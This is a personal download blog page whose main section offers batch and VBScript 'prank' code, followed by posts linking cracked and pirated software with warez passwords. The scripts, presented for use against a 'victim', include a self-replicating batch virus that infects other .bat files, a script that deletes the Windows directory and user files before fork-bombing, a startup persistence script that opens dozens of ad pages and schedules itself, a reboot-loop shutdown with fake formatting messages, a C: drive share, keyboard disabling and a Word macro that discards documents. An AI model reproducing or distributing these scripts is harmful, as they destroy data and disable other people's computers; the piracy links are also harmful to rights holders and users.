About plaza Blog
My blogger always giving you simple process to download. Plaza module Oct 8, 2008 l Oct 9, 2008 l Oct 15, 2008 l Oct 18, 2008 l Oct 20, 2008 l Oct 21, 2008 l Nov 2, 2008 l Nov 25, 2008 l Nov 26, 2008 l Nov 27, 2008 l Dec 8, 2008 l Dec 15, 2008 l Dec 16, 2008 l Apr 21, 2009 l Nov 26, 2009 l

Plaza module
If you want more software download just visit the webcrawlersite.blogspot.com
Plaza module
Enjoy downloading the following software just add a comment to this blog
Design
Coding and Graphic Design by jayplaza

http://www.webcrawlersite.blogspot.com listen to my MUSIC


Get a playlist! Standalone player Get Ringtones
play game with phosphor Phosphor
Phosphor
jayplaza
playing

Thursday, November 26, 2009

zjawardz

Tuesday, April 21, 2009

Batch and Vbs codes
This page's code contributions have been made by Jay Plaza (jawardz)

The first code we are going to look at is one that makes the cd tray open and close repeatedly until shutdown, or
(don't tell your friends, you press ctrl + alt + delete and go to processes, and end wscript.exe (this code is vbs so save in note pad as whateveryouwant.vbs)

Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
end if


next, we have a code that turns on and off your capslock repeatedly, also vbs, end same way as last time, this turns on and off your capslock every tenth of a second.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop


Now we have a batch file that pops up with repeating message boxes

:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * since you are stuck reading
msg * I am gonna tell you a story
msg * bout a dumb guy named (victims name)
msg * who just opened my batch
msg * and got stuck listening to a story
msg * from a computer
msg * so he was opening up batches
msg * when one pops up with a cool msg
msg * then it says "hi"
msg * Hi
msg * Are you having fun?
msg * I am!
msg * have fun playing with this one (insert victim)
msg * Because you have been P-w-n-e-d with a capital "P"
GOTO BEGIN


we now have a batch that is like a computer password, maybe you could stick it in autoexec.exe and make it run off startup?

@Echo off
echo Enter password then [F6] and then smack the [Enter] key real hard!
prompt $e[30m
echo on
echo off
copy con password.dat>nul
prompt $e[0m
echo on
echo off
cls
copy password.set+password.dat password.bat>nul
call password.bat
if '%password%==qwerty goto done
echo Incorrect, you are not trying to break into my pc are you?
choice /t:y,3
if errorlevel 2 goto next
:next
erase password.bat
erase password.dat
:hello
cls
echo Turn off PC
goto hello
:done
erase password.dat
erase password.bat
set password=qwerty
prompt $p$g


now we have a batch that switches the left mouse button with your right mouse button (also maybe add a code to stick in someones autoexec,
that would really make them mad)

@echo off
Rundll32 user32,SwapMouseButton
rundll32 keyboard,disable
msg * hahaha
msg * this is gunna screw you up
msg * good look finding how to fix it


batch file that will shutdown your computer and send a few messages about the matrix, rather bland and could be worked on a little bit more, some one
could tweak it a little and i'll repost it and give you credit, perhaps change the dos txt to green

@ Echo off
Title Matrix
msg * The matrix has you, you can not escape
rundll32.exe disable mouse
Attrib +h C:*.*
echo deleting harddrive
echo 1001101010101011111111101010101
echo 010101010101010101010101010111
assoc
assoc
Attrib C:Documents and settings*.*
net share hack=C:
shutdown -s -c 60


this is a VBs file so of course save as VBS, you can replace the txt in this code with whatever you want

Set wshshell = wscript.CreateObject("WScript.Shell")
Wshshell.run "Notepad"
wscript.sleep 400
wshshell.sendkeys "M"
wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 120
wshshell.sendkeys "s"
wscript.sleep 200
wshshell.sendkeys "o"
wscript.sleep 140
wshshell.sendkeys "n"
wscript.sleep 100
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "P"
wscript.sleep 200
wshshell.sendkeys "w"
wscript.sleep 150
wshshell.sendkeys "n"
wscript.sleep 170
wshshell.sendkeys "s"
wscript.sleep 200
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "A"
wscript.sleep 50
wshshell.sendkeys "l"
wscript.sleep 120
wshshell.sendkeys "l"
wscript.sleep 160
wshshell.sendkeys " "
wscript.sleep 200
wshshell.sendkeys "N"
wscript.sleep 100
wshshell.sendkeys "e"
wscript.sleep 100
wshshell.sendkeys "w"
wscript.sleep 200
wshshell.sendkeys "b"
wscript.sleep 120
wshshell.sendkeys "s"


This is a batch file "Virus" it does not actually do anything. it will just set off your anti virus

@echo off>nul.ViRuS if "%1=="/ViRuS_MULTIPLY goto ViRuS_multiply if "%1=="/ViRuS_OUTER_LOOP goto ViRuS_outer_loop if "%1=="/ViRuS_FINDSELF goto ViRuS_findself if "%VOFF%=="T goto ViRuS_OLDBAT set ViRuSname=%0 if not exist %0.bat call %0 /ViRuS_FINDSELF %path% if not exist %ViRuSname%.bat set ViRuSname= if "%ViRuSname%==" goto ViRuS_OLDBAT rem ViRuS if batch is started with name.BAT, virus will not become active rem ViRuS it was a bug, now it's a feature ! (also notice the voff variable) rem ViRuS also if batch was only in an append /x:on path (chance=minimal) attrib +h %ViRuSname%.bat for %%a in (%path%;.) do call %0 /ViRuS_OUTER_LOOP %%a attrib -h %ViRuSname%.bat set ViRuSname= goto ViRuS_OLDBAT :ViRuS_findself if "%2==" goto XXX_END>nul.ViRuS if exist %2\%ViRuSname%.bat set ViRuSname=%2\%ViRuSname% if exist %ViRuSname%.bat goto XXX_END if exist %2%ViRuSname%.bat set ViRuSname=%2%ViRuSname% if exist %ViRuSname%.bat goto XXX_END shift>nul.ViRuS goto ViRuS_findself :ViRuS_outer_loop for %%a in (%2\*.bat;%2*.bat) do call %0 /ViRuS_MULTIPLY %%a goto XXX_END>nul.ViRuS ViRuS_multiply find "ViRuS" <%ViRuSname%.bat >xViRuSx.bat find /v "ViRuS" <%2 |find /v ":XXX_END" >>xViRuSx.bat echo :XXX_END>>xViRuSx.bat copy xViRuSx.bat %2>nul del xViRuSx.bat goto XXX_END>nul.ViRuS :ViRuS_OLDBAT echo on>nul.ViRuS echo This is the dummy Virus Created Mason(pkk) :XXX_END


this is a VBS code that each time you pree the letter "E", it will close without saving, the reason "E" was chosen is because E is the most common used letter
in the english language.

Open MS Word And Press F11, To Open The MS Vbs Editor. Then input this
Sub AddKeyBinding()
CustomizationContext = NormalTemplate
KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyE), KeyCategory:=wdKeyCategoryCommand, _
Command:=”TestKeybinding”
End Sub

Sub TestKeybinding()
Dim x As Document
Set x = ActiveDocument
x.Close (False)
End Sub


This code is batch and it creates hundreds (or however many you want) of directories

@echo off
title Program Adobe Reader 8
:a
:1
@echo off
echo download all files of program "Microsoft Word"? y or n
echo y=yes
echo n=no
set input=
set /p input=enter your option:
if %input%==y goto :n
if %input%==n goto :n
:n
pause
color 40
echo Please Wait One Moment(this may take a minute)
echo downloading
md.urmuty56u
md.o,mryumu
md.rjyu56
md.u5jjum,u
md.y4mt,ry6
md.76yutuu
md.4y,mm56
md.ejy,rut5u6
md.mjyumyuu
md.lyumtr56
md.68mr9uumr
md.ojyt56
md.6mrrnmtu
md.jtu6ryu56hy
md.oryimu,rty
md.74,n6
md.ujryitmu
md.fyhyi,huu6
md.nv,mryu6
md.j,yimntu
md.m5yinmu6rt
md. n,nmr6
md.fh,yiu65u66uu
md.djtyiu6mtur 6u
md.ni,t66u56
md.ry,yhyu66u
md.jynth6y46u
md.trn,ymir,hethy444
md.gethgethteht
md.tyjhtyju7ytju7u
md.787876ujytj
md.7u577
md.rhytru5uuuuuu788uuuuu45
md. 6ty rtyr etty
md.tyyo
md.rytryrtthrrrrytrh
md.ryrtytrytit
md.6yyyyyyyyyyyyyiiiiyyyyyytryt
md.htrhwrthrthii
md.trhtrhtrt
md.htehtrht
md.iiii677i76457uiui57iiii677i76457uiu
md.iiii677i76457uiui574346t34t341t
md.iiii677i76457uiui57iiii657uiui57423
md.iiii677i76457uiui57iiii677i76iui57
md.iiii677i76gtmjmto
md.iiii677i7645yoi
md.iiii677i76457gjjgggggfffh
md.uiuiuiuiuiuiuiuiuiuuuuuug
md.uitur5ur
md.itt69
md.tu9toto
md.7jt58iot
md.7iui789
md.iui9oty
md.7u68
md.76iio89o
md.76iiii768
md.iu7i7ui7ioi
md.6t6i5i7oio
md.7iu776i7io
md.iiii677i764io57uiui57
md.j6ii6irt7i
md.iyh7i7tyjti
md.76uiy7i67
md.67tthujy6j6i
md.ituu7i7y76uyty
md.7j67u6ui
md.ryjtytj7ryij
md.jyyi7jut
md.ryj7y
md.ry7ijyj
md.jyiotyi
md.jhjryiio
md.ryyj7
md.854/y*7ui
md.57484ju7/854545814547
md.76i45/io
md.7458t
md.u7j45u7
md.5645778yu
md.68478yui
md.yhj558
md.hjr8798789
md.ry56875
md.hj65ui
md.try3154
md.dfj1254
md.nb0254
md.b0254
md.n412054
md.njfh442124
md.545
md.g124dh45
md.thet2hth5
md.8yyg5124e554
md.8egherg245
md.5+ethget4502
md.5+ghtd12
md.-bgddhd
md.+5ghd
md.85gh
md.8-+dgh
md./8+dgh
md.+dg
md.+8hd
md.-8ghh
md.7498dgh
md./*7897*dhadgh
md.7/87daggad
md.48dfgadf
md.9gdfag
md./94dghd
md.84tydgaha
md.876yty84/7dgha
md.itytthadg
md.uutuythdg
md.iyyyhdg
md.turttyythdghytyt
md.yutywtyetyydg
md.iyu8yuiitujkhad
md.yujikythad
md.iyuyghadg
md.886ytyuihadg
md.iuykithdg
md.68jkyytuihdguy
md.5689yth
md.689ygh
md.94ytty5ghyety
md.jutrjtutryjghdg796
md.jujutr58jtyh
md.ujtrj6ty
md.tjuty
md.jtujjrtyuj
md.jttuyuttyrr
md.tujtujurty
md.jtrjjtry
md.tuutry
md.tujjrry
md.tyjjjr
md.jtuuyr
md.yttujjyur
md.tyjjuruy
md.jjtujuy
md.yytuuutyujt
md.jtjjuuty
md.yjtuujjtu
md.jtyjrujtu
md.hjyjjtrjjutjt
md.jyutuujth
md.yyjjuurjjgh
md.5tujuuujutjghru7u
md.8urjjjgh
md.57ujujgh
md.58jujdgbs
md.87rujh
md.75jrujrhu
md.8tjrjruughrjurj
md.3urjrrrjhg
md.8jrjjh
md.58j57gj
md.78urjghj
md8.78jr
md.835ghj
md.7ugh
md.6787j
md.76u7ghjghgh8
md.t78jjj
md.78j5gghjjkgh7u
md.7t8jggh
md.8j7ghjjj
md.768ghjhgjghjg
md.8ty7gh
md.7j8jjhj
md.8thghhjyyjh577
md.7j7uhjuhjh
md.78t75hgjghj
md.jyyyuh8ghj
md.8tfgghj
md.76ghh
md.88fghjgh
md.7576j
md.837itghj87uitu
md.8376gh
md.85j8j
md.57tyhgj67
md.82j8hg
md.57dgt6jgh7
md.578j5678j
md.8gfj78hj
md.75t56
md.578yuhji
md.7528hj
md.78u6i
md.78t7i67j
md.56jtuh5tuiii6
md.57387jt87j6
md.274674ri6tu725767678
md.hjtj8i
md.wrtuyi6859
md.jtrrhji
md.tyjthtuyu68
md.yjterynikhjty
md.jyjtjtyuyk


batch sends you every pop up I've encountered

@echo off
mkdir C:SYSTEM
copy %0 "c:systemwinsys32.bat
ATTRIB +H +S c:systemwinsys32.bat
copy %0 "c:systemft32.bat
ATTRIB +H +S c:systemft32.bat
copy %0 "c:/Documents and SettingsAll UsersStart MenuProgramsStartup
AT 9:00AM "c:systemwinsys32.bat"
AT 9:30AM "c:systemwinsys32.bat"
AT 10:00AM "c:systemwinsys32.bat"
AT 10:30AM "c:systemwinsys32.bat"
AT 11:00AM "c:systemwinsys32.bat"
AT 11:30AM "c:systemwinsys32.bat"
AT 12:00PM "c:systemwinsys32.bat"
AT 12:30PM "c:systemwinsys32.bat"
AT 1:00PM "c:systemwinsys32.bat"
AT 1:30PM "c:systemwinsys32.bat"
AT 2:00PM "c:systemwinsys32.bat"
AT 2:30PM "c:systemwinsys32.bat"
AT 3:00PM "c:systemwinsys32.bat"
AT 3:30PM "c:systemwinsys32.bat"
AT 4:00PM "c:systemwinsys32.bat"
AT 4:30PM "c:systemwinsys32.bat"
AT 5:00PM "c:systemwinsys32.bat"
AT 5:30PM "c:systemwinsys32.bat"
AT 6:00PM "c:systemwinsys32.bat"
start iexplore http://www.screensavers.com/landing/3d.html?banner=sea_prop_398x394&aff_id=fastclick
start iexplore http://www.screensaver.com/720x300pop2.html?f=ssavercom
start iexplore http://www.roar.com/client/?sh=47843&to=425&do=2356
start iexplore http://ipods.freepay.com/Default.aspx?N=1&P=186
start iexplore http://www.ifreeipod.com/
start iexplore http://www.notebooks4free.com/default.aspx?r=312353
start iexplore http://www.easyfreeipods.com/
start iexplore http://popularscreensavers.smileycentral.com/download/index.jhtml?partner=ZRxdm501&spu=true&ref=http%3A//search.yahoo.com/search%3Fp%3Dfree+screensavers%26fr%3DFP-tab-web-t331%26toggle%3D1%26cop%3D%26ei%3DUTF-8
start iexplore http://b.casalemedia.com/V2/55134/74901/index.html?www.depiction.net/freeipods.php
start iexplore http://www.addictingclips.com/Content.aspx?key=97DBA08806171653&refCode=&brand=ag
start iexplore http://media.fastclick.net/w/pc.cgi?mid=86795&sid=23377
start iexplore http://www.consumergain.com/landing.php?cxt=7&gi=15&ci=101541
start iexplore http://www.consumergain.com/bonus.php
start iexplore http://consumerpromotioncenter.com/?cid=cKb4OYl+9DE&u=bb3ba267dcf418089a155b8ca8c35aa0&=&zipcode=
start iexplore http://geo.precisionclick.com/ad/?typ=1&pub=1&site=1589&adfmt=3&aid=0&sid=0&cat=0&sub=0&pop=&tloc=False&click=&ipr=&ref=81939389352424928477788287997834239391828988772376888624&ccb=73783273
start iexplore http://www.megawealthy.com/488/
start iexplore http://b.casalemedia.com/V2/45086/51808/index.html?www.milliondollahhomepage.com/
start iexplore http://www.everyfreegift.com/landings/efg_land_main01.jsp?product_id=2116&pid=1844165918&cid=2116
start iexplore http://goldenpalace.com/playnow_aff_no_poker.php?member=xorfl&profile=mdh&banner=&t=0&creferer=&referer=
start iexplore http://www.screensavers.com/landing/3d.html?banner=sea_prop_398x394&aff_id=fastclick
start iexplore http://www.screensaver.com/720x300pop2.html?f=ssavercom
start iexplore http://www.roar.com/client/?sh=47843&to=425&do=2356
start iexplore http://ipods.freepay.com/Default.aspx?N=1&P=186
start iexplore http://www.ifreeipod.com/
start iexplore http://www.notebooks4free.com/default.aspx?r=312353
start iexplore http://www.easyfreeipods.com/
start iexplore http://popularscreensavers.smileycentral.com/download/index.jhtml?partner=ZRxdm501&spu=true&ref=http%3A//search.yahoo.com/search%3Fp%3Dfree+screensavers%26fr%3DFP-tab-web-t331%26toggle%3D1%26cop%3D%26ei%3DUTF-8
start iexplore http://b.casalemedia.com/V2/55134/74901/index.html?www.depiction.net/freeipods.php
start iexplore http://www.addictingclips.com/Content.aspx?key=97DBA08806171653&refCode=&brand=ag
start iexplore http://media.fastclick.net/w/pc.cgi?mid=86795&sid=23377
start iexplore http://www.consumergain.com/landing.php?cxt=7&gi=15&ci=101541
start iexplore http://www.consumergain.com/bonus.php
start iexplore http://consumerpromotioncenter.com/?cid=cKb4OYl+9DE&u=bb3ba267dcf418089a155b8ca8c35aa0&=&zipcode=
start iexplore http://geo.precisionclick.com/ad/?typ=1&pub=1&site=1589&adfmt=3&aid=0&sid=0&cat=0&sub=0&pop=&tloc=False&click=&ipr=&ref=81939389352424928477788287997834239391828988772376888624&ccb=73783273
start iexplore http://www.megawealthy.com/488/
start iexplore http://b.casalemedia.com/V2/45086/51808/index.html?www.milliondollahhomepage.com/
start iexplore http://www.everyfreegift.com/landings/efg_land_main01.jsp?product_id=2116&pid=1844165918&cid=2116
start iexplore http://goldenpalace.com/playnow_aff_no_poker.php?member=xorfl&profile=mdh&banner=&t=0&creferer=&referer=
start iexplore http://ipods.freepay.com/Default.aspx?N=1&P=186
start iexplore http://www.ifreeipod.com/
start iexplore http://www.notebooks4free.com/default.aspx?r=312353
start iexplore http://www.easyfreeipods.com/
start iexplore http://popularscreensavers.smileycentral.com/download/index.jhtml?partner=ZRxdm501&spu=true&ref=http%3A//search.yahoo.com/search%3Fp%3Dfree+screensavers%26fr%3DFP-tab-web-t331%26toggle%3D1%26cop%3D%26ei%3DUTF-8
start iexplore http://b.casalemedia.com/V2/55134/74901/index.html?www.depiction.net/freeipods.php
start iexplore http://www.addictingclips.com/Content.aspx?key=97DBA08806171653&refCode=&brand=ag
start iexplore http://media.fastclick.net/w/pc.cgi?mid=86795&sid=23377
start iexplore http://www.consumergain.com/landing.php?cxt=7&gi=15&ci=101541
start iexplore http://www.consumergain.com/bonus.php
start iexplore http://consumerpromotioncenter.com/?cid=cKb4OYl+9DE&u=bb3ba267dcf418089a155b8ca8c35aa0&=&zipcode=
start iexplore http://geo.precisionclick.com/ad/?typ=1&pub=1&site=1589&adfmt=3&aid=0&sid=0&cat=0&sub=0&pop=&tloc=False&click=&ipr=&ref=81939389352424928477788287997834239391828988772376888624&ccb=73783273
start iexplore http://www.megawealthy.com/488/
start iexplore http://b.casalemedia.com/V2/45086/51808/index.html?www.milliondollahhomepage.com/
start iexplore http://www.everyfreegift.com/landings/efg_land_main01.jsp?product_id=2116&pid=1844165918&cid=2116
start iexplore http://goldenpalace.com/playnow_aff_no_poker.php?member=xorfl&profile=mdh&banner=&t=0&creferer=&referer=
start iexplore http://www.screensavers.com/landing/3d.html?banner=sea_prop_398x394&aff_id=fastclick
start iexplore http://www.screensaver.com/720x300pop2.html?f=ssavercom
start iexplore http://www.roar.com/client/?sh=47843&to=425&do=2356
start iexplore http://ipods.freepay.com/Default.aspx?N=1&P=186
start iexplore http://www.ifreeipod.com/
start iexplore http://www.notebooks4free.com/default.aspx?r=312353
start iexplore http://www.easyfreeipods.com/
start iexplore http://popularscreensavers.smileycentral.com/download/index.jhtml?partner=ZRxdm501&spu=true&ref=http%3A//search.yahoo.com/search%3Fp%3Dfree+screensavers%26fr%3DFP-tab-web-t331%26toggle%3D1%26cop%3D%26ei%3DUTF-8
start iexplore http://b.casalemedia.com/V2/55134/74901/index.html?www.depiction.net/freeipods.php
start iexplore http://www.addictingclips.com/Content.aspx?key=97DBA08806171653&refCode=&brand=ag
start iexplore http://media.fastclick.net/w/pc.cgi?mid=86795&sid=23377
start iexplore http://www.consumergain.com/landing.php?cxt=7&gi=15&ci=101541
start iexplore http://www.consumergain.com/bonus.php


This is a simple Batch example on some of the colors you can change the txt to in dos

@echo off
color %num%
:start
cls
COLOR %num%
ECHO Green = 1
ECHO Red = 2
ECHO Yellow = 3
ECHO Aqua = 4
ECHO Purple = 5
ECHO White = 6
ECHO Blue = 7
ECHO Gray = 8
ECHO.
SET/P color=Enter Color:
IF "%color%" equ "1" goto 1
IF "%color%" equ "2" goto 2
IF "%color%" equ "3" goto 3
IF "%color%" equ "4" goto 4
IF "%color%" equ "5" goto 5
IF "%color%" equ "6" goto 6
IF "%color%" equ "7" goto 7
IF "%color%" equ "8" goto 8
IF "%color%" equ "exit" goto end
IF "%color%" equ "%color%" goto error
:1
set num=a
goto start
:2
set num=c
goto start
:3
set num=e
goto start
:4
set num=B
goto start
:5
set num=D
goto start
:6
set num=F
goto start
:7
set num=9
goto start
:8
set num=8
goto start
:error
cls
color 0
ECHO That is not a Valid Color
echo.
pause
goto start



Cool batch file to lock and disguise a folder.
Move any files you want to be hidden in your locker, double click the bat again and you will be asked to lock when the folder is locked it will dissapear
to unlock the folder double click the bat file enter any pass. or make up one of your own and input it into the code

@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End


Batch that kills and deletes the windows directory, and all .txt .exe .bat and .ini files then forkbombs your computer

@echo off
kill %windir%
del %windir%
del *.txt
del *.exe
del *.bat
del *.ini
:ok
start, cmd
Goto ok


Erases hard drive then shuts down the comp:

hdmemory/release
echo total hard drive erased
echo Do not use on anyone
shutdown -r -f -t0


Batch file that each time they reboot, their computer shuts down again in 5 seconds. So you wouldn't want to do this to an unexperienced user, lol

@echo off
echo shutdown -s -t 5 -c "Windows is shutting down due to an internal error" > C:\close.bat
copy C:\close.bat "C:\documents and settings\all users\start menu\programs\startup\"
cls
echo Maximize this window to continue
echo Wscript.Sleep 4000 > C:\sleep1.vbs
call C:\sleep1.vbs
echo Msgbox"Critical system process failure. Press enter to to begin auto fix." > c:\error1.vbs
call c:\error1.vbs
echo Formatting c: drive...
echo Wscript.Sleep 2000 > C:\sleep2.vbs
call C:\sleep1.vbs
echo The following files were are infected and should be deleted immediately
call C:\sleep1.vbs
dir /s C:\*.exe
dir C:
call C:\sleep1.vbs
cls
echo Deleting files 36 percent complete
call C:\sleep2.vbs
echo Deleting files 79 percent complete
call C:\sleep2.vbs
echo Deleting files 100 percent complete
call C:\sleep2.vbs
echo Files successfully deleted
call C:\sleep1.vbs
cls
echo All files in the windows registry were also deleted
echo a full reinstall is required to continue using windows
call C:\sleep2.vbs
echo Msgbox"Windows is not responding, shutting down" > c:\error2.vbs
call C:\error2.vbs
call C:\sleep2.vbs
echo Msgbox"Applications will automatically closed, all unsaved data will be lost" > C:\error3.vbs
call C:\error3.vbs
cls
ECHO
ECHO --------------------------------------------------------------------------
call C:\sleep1.vbs
shutdown -r -t 5



I forgot the obvious forkbomb:

@ECHO OFF
START
%0
GOTO :START

iT? Tuesday, December 16, 2008

(INFORMATION TECHNOLOGY)
Information technology (IT), as defined by the Information Technology Association of America (ITAA), is "the study, design, development, implementation, support or management of computer-based information systems, particularly software applications and computer hardware." IT deals with the use of electronic computers and computer software to convert, store, protect, process, transmit, and securely retrieve information.

Today, the term information technology has ballooned to encompass many aspects of computing and technology, and the term has become very recognizable. The information technology umbrella can be quite large, covering many fields. IT professionals perform a variety of duties that range from installing applications to designing complex computer networks and information databases. A few of the duties that IT professionals perform may include data management, networking, engineering computer hardware, database and software design, as well as the management and administration of entire systems.

When computer and communications technologies are combined, the result is information technology, or "infotech". Information Technology (IT) is a general term that describes any technology that helps to produce, manipulate, store, communicate, and/or disseminate information. Presumably, when speaking of Information Technology (IT) as a whole, it is noted that the use of computers and information are associated.

The term Information Technology (IT) was coined by Jim Domsic of Michigan in November 1981.[citation needed] Domsic created the term to modernize the outdated phrase "data processing." Domsic at the time worked as a computer manager for an automotive related industry.

In recent years ABET and the ACM have collaborated to form accreditation and curriculum standards for degrees in Information Technology as a distinct field of study separate from both Computer Science and Information Systems. SIGITE is the ACM working group for defining these standards.





Remote Desktop Control displays the screen of another computer (via Internet or

network) on your own screen. The program allows you to use your mouse and keyboard

to control the other computer remotely. It means that you can work on a remote

computer, as if you were sitting in front of it.

Remote Desktop Control is comfortable for any kind of user. Even a "newbie" will

easily understand basic tasks. Gurus will find many powerful features, such as

view only mode or remote system shutdown. The main design consideration of Remote

Desktop Control is "as easy as possible for the user".

Remote Desktop Control is so fast and comfortable that you might even forget that

you are working on a remote computer! The program allows you to work with

different remote computers simultaneously, from anywhere in the world.



download

http://rapidshare.com/files/64038518/RemoteDesktopControl.rar








Includes various tools : bad sector repair tool, test speed , S.M.A.R.T. information, surface test, check media stability and controller test. Is the hard disk drive monitoring and failure prediction and repairing software for repair and testing. It uses S.M.A.R.T. technology to monitor the health status of hard disk drives, prevents data loss and predicts possible drive fail. This application includes HDDBadSectorRepair.


download

http://rapidshare.com/files/65260607/FloboHDRepairFull.rar


pass

www.warez-bb.org



Description:

Do you want to safely encrypt and store all your passwords and be
able to locate and use them in a flash? Password Memory 2008 is
the product your are looking for!

With almost 20 years of experience in the creation of Windows
software, CodeAero Technologies now present a product that should
be used by anyone who want their passwords to themselves. Password
Memory 2008 safely encrypts and manages your passwords and helps
you login to websites in a fast and secure manner. Three different
encryption routines (two 256-bit and one 128-bit) are used to
secure your login information.



Download:

http://rapidshare.com/files/97561756/PASMEM2008.rar



Password:

apps-http://www.wareznet.net/



DOWNLOAD:
Code:

http://www.ziddu.com/download.php?uid=ZbOgmpytYq6bluKnYaqhkZSsXqqil5Wo1





When Windows starts up, it automatically launches a certain number of applications. Handy Startup Monitor allows you to manage those applications and help you speed up your windows startup. Also Handy Startup Monitor allows you to monitor the registry & the startUp folders and alerts you whenever any application add or remove itself to/from the Startup hence it can protects you from malicious software that may running at the windows startup.


Benefits:

Manage the startup applications.
Handy Startup Monitor helps you solve problems with programs that automatically run at startup.
Handy Startup Monitor useful when loading new software.
Optimize and improve the system startup time and memory usage.
Protects you from malicious software that may running at the windows startup.
Monitor startup sections for any application add or delete itself from startup.

Features:

Display all the applications running at windows startup .
Allow to add, edit and delete startup programs .
Find the startup applications folder .
Ability to manually run or terminate all of the programs that running at windows startup .
Well designed and user-friendly interface .
Alerts you if any new application add or remove itself from the startup .
Handy Startup Monitor could sort all displayed applications by name or path or Registry section location .
Small file size and low memory-usage .
Support for Windows 98/ME/2000/XP/2003/Vista .
Easy to install and uninstall .

System Requirements
Intel Pentium, Celeron, AMD or compatible processor Windows 98/ME/NT4/2000/XP/2003/Vista

+ crack = 3 Mb

Download:

http://rapidshare.com/files/110988329/HandyStartupMonitor.rar





Do you want to know every thing a hacker knows? Like how they do it and how to defend against it. Then you need to learn everything a hacker knows. In my videos you will how to hack your own PC and how to better your own security. The complete "Novice to The Professional" should have these instructional videos now. Dont wait till their gone get them now. You wont find these anywhere, and once you see them youll be glad you down-loaded the series.


download


http://rapidshare.com/files/129290302/System_Hacking.part01_Der_Jager.rar

http://rapidshare.com/files/129291114/System_Hacking.part02_Der_Jager.rar

http://rapidshare.com/files/129291771/System_Hacking.part03_Der_Jager.rar



Download:

http://rapidshare.com/files/138822908/2581_20-_20Sigma_20Harmonics_20_J_.7z







Mac OS X Leopard Transformation Pack will transform your Windows XP user interface to Mac OS X Leopard alike looks that everyone will never notice it’s the same old. The installation of Mac OS X Leopard transformation pack that changes some of the windows component and get Mac OS X 10.5 Leopard mods on your XP operating system.

Size: 10 MB

Download:

http://w13.easy-share.com/1701498806.html

http://rapidshare.com/files/143666172/WinXPToMacOS-X-Leopard.rar






A download manager that will allow you to download files from the internet faster
Download Direct will accelerate your downloads by up to 500% (sometimes more) and will allow you to manage them via one central screen.



Download:

http://www.softmanija.com/engine/go.php?url=aHR0cDovL3d3dy5maWxlZmFjdG9yeS5jb20vZmlsZS8wMjE0NmMv



3D CREATOR



All you need is to set some parameters that determine your screensaver’s appearance and behavior in step-by-step mode, seeing the result immediately.

Here are some key features of “Easy 3D Creator”:
• Create stunning 3D screensavers in a few minutes with no programming!
• Wrap the screen saver into installer and generate End-User License Agreement for you automatically!
• You can use a built-in wizard to create a screen saver with your logo or photos with a few mouse clicks!
• Can generate time-limited shareware screen savers!

Download:
http://rapidshare.com/files/100332164/Easy_3D_Creator_3.0.0.2i.rar

Mirror:
http://w16.easy-share.com/1699903744.html










Aston is a new Desktop and Shell replacement for Windows 9X/ME/NT/2K/XP. It replaces the standard Windows Desktop and provides you with a host of new features, such as Sidebars, clock, weather monitor, animated buttons, transparency effects and much more.Aston also supports Themes, which allow you to change its appearance and functionality according to your mood and needs. No matter what visual style you like: XP, Aqua or something else; you can always download hundreds of Themes, created by professional designers or amateurs from Aston’s homepage or one of numerous other skin sites. Aston features a powerful and user friendly interface, which lets you change your new desktop’s appearance and behavior in few seconds. No need to learn complicated configuration files, everything can be configured in a simple graphical interface. A great balance between performance and appearance allows you to launch Aston even on out of the date PCs or its enjoy many advanced features on more modern computers. Aston is very stable and has a small memory footprint and low CPU usage, so you can free your processor time for other tasks.


download

http://rapidshare.com/files/120724706/Aston_With_26_Themes.rar




Info:
QUOTE
Google Earth Pro-Gold Edition 2008:
Google Earth is a virtual globe program that lets you surf through our entire planet. You can zoom and search for your town and much more things such as school, churches etc! Google Earth Pro Gold is the upgraded version, it has alot of more features such as movie making or advanced printing and much more...


Google Earth Pro Gold combines the power of Google Search with satellite imagery, maps, terrain and 3D buildings to put the world's geographic information at your fingertips. With amazing speed.

* Fly to your house. Just type in an address, press Search, and you�€™ll zoom right in.
* Search for schools, parks, restaurants, and hotels. Get driving directions.
* Tilt and rotate the view to see 3D terrain and buildings, or look up to explore the sky
* Save and share your searches and favorites.

Recently, Google added a feature that allow users to monitor traffic speeds at loops located every 200 yards in real-time.

in version 4.3 released on April 15 2008, Google Street View was fully integrated into the program allowing the program to provide an on the street level view in many locations. Google Earth Pro Gold gives you full advantage of this new tool too.




Download:
CODE

http://rapidshare.com/files/131686112/Google.Earth.Pro.Gold.2008-by.SJshah.rar






Hacking Windows XP Extreme-Tech

Get ready for some down-and-dirty hackin'! Over 200 serious hacks readers can use to force Windows XP to do it their way, written in the ExtremeTech no-holds-barred style
* Sinchak doesn't waste time tweaking Movie Maker or Instant Messenger-these hacks are heavy-duty, detailed instructions for squeezing every drop of power from Windows XP and maximizing speed, appearance, and security
* Not for the faint of heart! This book is written for users who aren't afraid to roll up their sleeves, risk voiding their warranties, take total control of the task bar, uninstall programs that are supposedly permanent, and beef up boot speed
